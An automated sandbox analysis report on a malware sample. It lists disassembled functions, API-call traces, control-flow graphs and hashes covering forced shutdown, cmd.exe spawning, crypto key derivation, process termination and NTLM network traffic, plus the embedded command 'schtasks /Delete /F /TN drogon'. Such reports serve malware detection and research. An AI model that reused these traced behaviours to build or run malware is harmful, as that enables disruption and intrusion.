                                              Function 04BF8A23 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 24shutdownCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80BC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80CC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80DC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF80EC
                                                • Part of subcall function 04BF808E: wsprintfW.USER32 ref: 04BF8126
                                              • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000001,80000000), ref: 04BF8A54
                                              • ExitWindowsEx.USER32(00000006,00000000), ref: 04BF8A61
                                              • ExitProcess.KERNEL32 ref: 04BF8A68
                                                • Part of subcall function 04BF7FB7: wsprintfW.USER32 ref: 04BF7FD6
                                                • Part of subcall function 04BF7FB7: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C), ref: 04BF7FFA
                                                • Part of subcall function 04BF7FB7: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04BF800C
                                                • Part of subcall function 04BF7FB7: lstrcatW.KERNEL32(?,\cmd.exe), ref: 04BF8022
                                                • Part of subcall function 04BF7FB7: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 04BF8069
                                                • Part of subcall function 04BF7FB7: Sleep.KERNELBASE(00000000), ref: 04BF807F
                                              Strings
                                              • schtasks /Delete /F /TN drogon, xrefs: 04BF8A35
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: wsprintf$ExitProcessSystem$CreateDirectoryEnvironmentInitiateShutdownSleepVariableWindowslstrcat
                                              • String ID: schtasks /Delete /F /TN drogon
                                              • API String ID: 3579268615-951750757
                                              • Opcode ID: 00a38238adc546238de17f9ff8deaac5115ce3249003f650cb758e9084cc907d
                                              • Instruction ID: cc8949f6e088f90cdd263d1098c7aa88fbb4b6aa14f7fe55d8a22ee90ac07561
                                              • Opcode Fuzzy Hash: 00a38238adc546238de17f9ff8deaac5115ce3249003f650cb758e9084cc907d
                                              • Instruction Fuzzy Hash: 65E04620252260B6E23677716C1DFDB2D4DEF02B99F044280FB4E61080CB9A6A8AC5F5
                                              Function 04BF9016 Relevance: 6.1, APIs: 4, Instructions: 109memorylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,00000004,?), ref: 04BF9090
                                              • LoadLibraryA.KERNELBASE(?), ref: 04BF90BA
                                              • GetProcAddress.KERNELBASE(00000000,?), ref: 04BF90FD
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04BF913D
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual$AddressLibraryLoadProc
                                              • String ID:
                                              • API String ID: 3300690313-0
                                              • Opcode ID: 56d92596e993abba21a27104da6ff32b14a141e6deab0acdd6baafda1e55c292
                                              • Instruction ID: 2574ab77260515ad61ea3c597bb1a594c063b46ceab6ae23148a25cd3b924a17
                                              • Opcode Fuzzy Hash: 56d92596e993abba21a27104da6ff32b14a141e6deab0acdd6baafda1e55c292
                                              • Instruction Fuzzy Hash: FB413BB1900216EFDB14CFA8CC88BA9B7F8FF04315F1544A9DA19A7251D374EA94CB50
                                              Function 04BF6085 Relevance: 6.0, APIs: 4, Instructions: 49encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60A6
                                              • CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60BA
                                              • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60D3
                                              • CryptDestroyHash.ADVAPI32(?,?,?,?,04BF62E0,?,?,?,?), ref: 04BF60DF
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,?,?,00000000), ref: 04BF55BC
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 04BF55CB
                                                • Part of subcall function 04BF559B: CryptGetKeyParam.ADVAPI32(?,00000001,00000000,?,00000000), ref: 04BF55DA
                                                • Part of subcall function 04BF559B: LocalAlloc.KERNEL32(00000040,?), ref: 04BF55EE
                                                • Part of subcall function 04BF559B: CryptSetKeyParam.ADVAPI32(?,00000001,00000000,00000000), ref: 04BF5601
                                                • Part of subcall function 04BF559B: LocalFree.KERNEL32(?), ref: 04BF5606
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
                                              • String ID:
                                              • API String ID: 797921460-0
                                              • Opcode ID: 93889b94884bd419cf4301b389614f7fe9adb0ce41ff049544b424a3041a08b7
                                              • Instruction ID: c251eb638056ee962526363294f47f2510a7f9d2c4006b94a98b49032645c495
                                              • Opcode Fuzzy Hash: 93889b94884bd419cf4301b389614f7fe9adb0ce41ff049544b424a3041a08b7
                                              • Instruction Fuzzy Hash: 42011271900108BFEB119FB5DCC5D9EBBBDEB04750B1004AAFA05E6140D771AE459B20
                                              Function 04BF84EE Relevance: 6.0, APIs: 4, Instructions: 35processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 04BF84FC
                                              • Process32FirstW.KERNEL32(00000000,?), ref: 04BF851B
                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04BF853E
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 04BF8556
                                                • Part of subcall function 04BF841D: GetCurrentProcessId.KERNEL32(?,04BF8555,?,?), ref: 04BF8430
                                                • Part of subcall function 04BF841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,04BF8555,?,?), ref: 04BF844C
                                                • Part of subcall function 04BF841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,04BF8555,?,?), ref: 04BF8464
                                                • Part of subcall function 04BF841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,04BF8555,?,?), ref: 04BF847D
                                                • Part of subcall function 04BF841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 04BF84A3
                                                • Part of subcall function 04BF841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 04BF84BA
                                                • Part of subcall function 04BF841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 04BF84CB
                                                • Part of subcall function 04BF841D: FreeSid.ADVAPI32(?), ref: 04BF84D4
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(?), ref: 04BF84DD
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(?,?,?,?,04BF8555,?,?), ref: 04BF84E2
                                                • Part of subcall function 04BF841D: CloseHandle.KERNEL32(00000000,?,?,?,04BF8555,?,?), ref: 04BF84E5
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                              • String ID:
                                              • API String ID: 3524103904-0
                                              • Opcode ID: 17bb49c5d8d991589e41888b0ba7822441a257b60d50cb64056fbb3a113bbc8e
                                              • Instruction ID: fe491b6fd0f02da5e9276f48bdcf28ce2a364840fff4837f7db4213c192cbeab
                                              • Opcode Fuzzy Hash: 17bb49c5d8d991589e41888b0ba7822441a257b60d50cb64056fbb3a113bbc8e
                                              • Instruction Fuzzy Hash: 7BF03071501524ABEB217BB4AC0EFDE7A7CDB09314F1001D2EA1EE2090E774FE588EA5
                                              Function 04BF554A Relevance: 6.0, APIs: 4, Instructions: 30encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04BF5561
                                              • GetLastError.KERNEL32(?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF556B
                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF5581
                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04BF790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04BF79E8), ref: 04BF558E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                              • String ID:
                                              • API String ID: 2963463078-0
                                              • Opcode ID: 4d4f3f8835d3010a30353e525a10b3b55256fdcdd942f6b92d96a92c10f5876d
                                              • Instruction ID: aa27b5208e59fd58f621fca20f35c2b2cfd4c0eba4d7897d4b96ccda03f6f062
                                              • Opcode Fuzzy Hash: 4d4f3f8835d3010a30353e525a10b3b55256fdcdd942f6b92d96a92c10f5876d
                                              • Instruction Fuzzy Hash: 69F01C36600208FBDF205BB6ED09F8E7ABEEBC4711F204055FA0AD7110D638AE15EB20
                                              Function 04BF5507 Relevance: 4.5, APIs: 3, Instructions: 29encryptionCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04BF62C3,?), ref: 04BF5520
                                              • GetLastError.KERNEL32(?,04BF62C3,?), ref: 04BF5528
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04BF62C3,?), ref: 04BF553E
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: AcquireContextCrypt$ErrorLast
                                              • String ID:
                                              • API String ID: 2779411412-0
                                              • Opcode ID: d3bfbb9ff6718c0fdd8d87f6271fd00b5e3586cc4c48b3e210f324b9d4add08d
                                              • Instruction ID: e75dec6fbdecc7d167cd700c17d1ca57d81af62a926696d30b1e9ea4d54ac776
                                              • Opcode Fuzzy Hash: d3bfbb9ff6718c0fdd8d87f6271fd00b5e3586cc4c48b3e210f324b9d4add08d
                                              • Instruction Fuzzy Hash: 66E04F7138421D7AFB2019989C82F567A9DDB18754F108067F709E6191CAD1BD1457F4
                                              Function 04BF7D4E Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                              Download Yara Rule
                                              APIs
                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,70204950,?,?,04BF8C7C), ref: 04BF7D5F
                                              • NetApiBufferFree.NETAPI32(?,?,?,04BF8C7C), ref: 04BF7D82
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: BufferFreeInfoServer
                                              • String ID:
                                              • API String ID: 3855943681-0
                                              • Opcode ID: 18f670c5d51ca132adff663fa53196a8ad99c2ff19ec677b634d19f8bb166ce9
                                              • Instruction ID: 745ef822a91e30393c04e30752764f69acb99a8a4e025e0e89c1ec89900726bc
                                              • Opcode Fuzzy Hash: 18f670c5d51ca132adff663fa53196a8ad99c2ff19ec677b634d19f8bb166ce9
                                              • Instruction Fuzzy Hash: A3E09BB5701624A7EF24CA95CD04BBA765CDF00651B4001DAAD56D3100E720EE0696E0
                                              Function 04BF1747 Relevance: 70.4, APIs: 38, Strings: 2, Instructions: 424memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 4bf1747-4bf1757 1 4bf175a-4bf1763 0->1 1->1 2 4bf1765-4bf1795 GetProcessHeap HeapAlloc 1->2 3 4bf179b-4bf17a0 2->3 4 4bf1c30-4bf1c37 2->4 5 4bf17a2-4bf17af 3->5 5->5 6 4bf17b1-4bf17bb CharUpperW 5->6 7 4bf17be-4bf17c7 6->7 7->7 8 4bf17c9-4bf17e6 GetProcessHeap HeapAlloc 7->8 9 4bf17ec-4bf184b htons 8->9 10 4bf1c22-4bf1c2a GetProcessHeap HeapFree 8->10 11 4bf184e-4bf1857 9->11 10->4 11->11 12 4bf1859-4bf186b send 11->12 13 4bf1c16-4bf1c1c GetProcessHeap HeapFree 12->13 14 4bf1871-4bf188a recv 12->14 13->10 14->13 15 4bf1890-4bf18a5 14->15 15->13 16 4bf18ab-4bf18ad 15->16 17 4bf18ae-4bf18c1 16->17 18 4bf18ce-4bf18d2 17->18 19 4bf18c3-4bf18c5 17->19 18->17 20 4bf18d4 18->20 19->18 21 4bf18c7-4bf18cc 19->21 20->13 21->18 22 4bf18d9-4bf1904 GetProcessHeap HeapAlloc 21->22 22->13 23 4bf190a-4bf1926 call 4bf15a7 22->23 26 4bf192c-4bf1948 call 4bf15a7 23->26 27 4bf1c08-4bf1c10 GetProcessHeap HeapFree 23->27 26->27 30 4bf194e-4bf1962 GetProcessHeap HeapAlloc 26->30 27->13 31 4bf1bfa-4bf1c02 GetProcessHeap HeapFree 30->31 32 4bf1968-4bf197c 30->32 31->27 33 4bf1983-4bf1994 rand 32->33 33->33 34 4bf1996-4bf19ae call 4bf15a7 33->34 37 4bf1bec-4bf1bf4 GetProcessHeap HeapFree 34->37 38 4bf19b4-4bf19c2 GetProcessHeap HeapAlloc 34->38 37->31 39 4bf1bde-4bf1be6 GetProcessHeap HeapFree 38->39 40 4bf19c8-4bf19e5 38->40 39->37 41 4bf19e7-4bf19ed 40->41 42 4bf19f4-4bf1a08 40->42 41->42 43 4bf1a0e-4bf1a20 GetProcessHeap HeapAlloc 42->43 44 4bf1a0a 42->44 45 4bf1a26-4bf1a74 htons 43->45 46 4bf1bc3-4bf1bdb GetProcessHeap HeapFree 43->46 44->43 47 4bf1a7d-4bf1ad1 45->47 48 4bf1a76-4bf1a79 45->48 46->39 49 4bf1b0e-4bf1b2d 47->49 50 4bf1ad3-4bf1b0c 47->50 48->47 51 4bf1b31-4bf1b55 memcpy 49->51 50->51 52 4bf1b57-4bf1b64 51->52 53 4bf1b66-4bf1b6f 51->53 54 4bf1b71-4bf1b82 send 52->54 53->54 55 4bf1b84-4bf1b9b recv 54->55 56 4bf1bb3-4bf1bbd GetProcessHeap HeapFree 54->56 55->56 57 4bf1b9d-4bf1ba1 55->57 56->46 58 4bf1ba7-4bf1bb0 memset 57->58 59 4bf1ba3 57->59 58->56 59->58
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,04BF1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 04BF1783
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF178C
                                              • CharUpperW.USER32(00000000), ref: 04BF17B2
                                              • GetProcessHeap.KERNEL32(00000008,00000086), ref: 04BF17DA
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF17DD
                                              • htons.WS2_32(00000082), ref: 04BF1801
                                              • send.WS2_32(00000086,?,00000086,00000041), ref: 04BF1863
                                              • recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 04BF187F
                                              • GetProcessHeap.KERNEL32(00000008,00000018), ref: 04BF18F4
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF18FD
                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 04BF1958
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF195B
                                              • rand.MSVCRT ref: 04BF1983
                                              • GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 04BF19B8
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF19BB
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1A13
                                              • HeapAlloc.KERNEL32(00000000), ref: 04BF1A16
                                              • htons.WS2_32(-000000FC), ref: 04BF1A39
                                              • memcpy.MSVCRT ref: 04BF1B48
                                              • send.WS2_32(?,00000000,00000000,00000000), ref: 04BF1B7A
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF1B93
                                              • memset.MSVCRT ref: 04BF1BAB
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1BB6
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BBD
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04BF1BC8
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BCF
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1BE3
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BE6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 04BF1BF1
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1BF4
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1BFF
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C02
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 04BF1C0D
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C10
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1C19
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C1C
                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 04BF1C27
                                              • HeapFree.KERNEL32(00000000), ref: 04BF1C2A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
                                              • String ID: NTLM$SSP
                                              • API String ID: 2370844593-3976291102
                                              • Opcode ID: c9b3ed60ad4259f46f44bd26e4be92acf9e36f3310925807b745f7411830b5d4
                                              • Instruction ID: 98919609caee188cae9340ad4a6259e3b50844887a6bf3513669f5ee6b368b96
                                              • Opcode Fuzzy Hash: c9b3ed60ad4259f46f44bd26e4be92acf9e36f3310925807b745f7411830b5d4
                                              • Instruction Fuzzy Hash: 41F19E75900245EFDF14DFA8CC85BAA7BB4FF48300F04849AEA49DB292E775E805DB64
                                              Function 04BF2497 Relevance: 39.2, APIs: 26, Instructions: 199memorynetworkCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 109 4bf2497-4bf24bf GetProcessHeap HeapAlloc 110 4bf26ff-4bf2705 109->110 111 4bf24c5-4bf24d6 GetProcessHeap HeapAlloc 109->111 112 4bf26ec-4bf26fe GetProcessHeap HeapFree 111->112 113 4bf24dc-4bf255d rand htons 111->113 112->110 114 4bf256f-4bf258a GetProcessHeap HeapAlloc 113->114 115 4bf255f-4bf256d rand 113->115 116 4bf26dc-4bf26e6 GetProcessHeap HeapFree 114->116 117 4bf2590-4bf25cb htons 114->117 115->114 115->115 116->112 118 4bf25cd-4bf25db rand 117->118 118->118 119 4bf25dd-4bf25f8 GetProcessHeap HeapAlloc 118->119 120 4bf25fe-4bf2634 memcpy * 2 send 119->120 121 4bf26cc-4bf26d6 GetProcessHeap HeapFree 119->121 122 4bf26ba-4bf26c6 GetProcessHeap HeapFree 120->122 123 4bf263a-4bf2651 send 120->123 121->116 122->121 123->122 124 4bf2653-4bf2667 123->124 125 4bf2694-4bf269b recv 124->125 126 4bf269d 125->126 127 4bf2669-4bf2677 125->127 126->122 127->122 128 4bf2679-4bf2680 127->128 128->122 129 4bf2682-4bf2688 128->129 130 4bf269f-4bf26a3 129->130 131 4bf268a-4bf2693 129->131 132 4bf26b6 130->132 133 4bf26a5-4bf26b4 call 4bf2344 130->133 131->125 132->122 133->122
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24AF
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24B8
                                              • GetProcessHeap.KERNEL32(00000008,00001124,771AF380,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24CD
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF24D0
                                              • rand.MSVCRT ref: 04BF24E1
                                              • htons.WS2_32(00001120), ref: 04BF24FF
                                              • rand.MSVCRT ref: 04BF255F
                                              • GetProcessHeap.KERNEL32(00000008,00000160,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF2576
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF257D
                                              • htons.WS2_32(0000015C), ref: 04BF259F
                                              • rand.MSVCRT ref: 04BF25CD
                                              • GetProcessHeap.KERNEL32(00000008,00001284,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF25E4
                                              • HeapAlloc.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF25EB
                                              • memcpy.MSVCRT ref: 04BF2605
                                              • memcpy.MSVCRT ref: 04BF2617
                                              • send.WS2_32(?,00000000,0000111C,00000000), ref: 04BF2630
                                              • send.WS2_32(?,?,00000168,00000000), ref: 04BF264D
                                              • recv.WS2_32(?,?,0000FFFF,00000000), ref: 04BF2697
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26BF
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26C6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26CF
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26D6
                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26DF
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26E6
                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26F1
                                              • HeapFree.KERNEL32(00000000,?,?,?,04BF471C,?,?,?,?,?), ref: 04BF26F8
                                              Memory Dump Source
                                              • Source File: 00000003.00000002.1325386935.0000000004BF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: true
                                              • Associated: 00000003.00000002.1325367286.0000000004BF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325408516.0000000004BFD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325451113.0000000004C03000.00000004.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000003.00000002.1325468211.0000000004C09000.00000002.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_3_2_4bf0000_rundll32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocFree$rand$htonsmemcpysend$recv
                                              • String ID:
                                              • API String ID: 3700823678-0
                                              • Opcode ID: 314636c32d61e88ccb562140b8d806c541292b9ff82459506caa693cfcda2ac4
                                              • Instruction ID: 05e7cf551fcdbe47f42ef9925ffffbb79cde1bec97e1d539862b2940111ff8c1
                                              • Opcode Fuzzy Hash: 314636c32d61e88ccb562140b8d806c541292b9ff82459506caa693cfcda2ac4
                                              • Instruction Fuzzy Hash: 2D71D375900345FFEB149FA4CC49B9A7B68FF48700F04419AFB099B285D7B9E815CBA4
                                              Function 04BF79D7 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 237threadsleepprocessCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
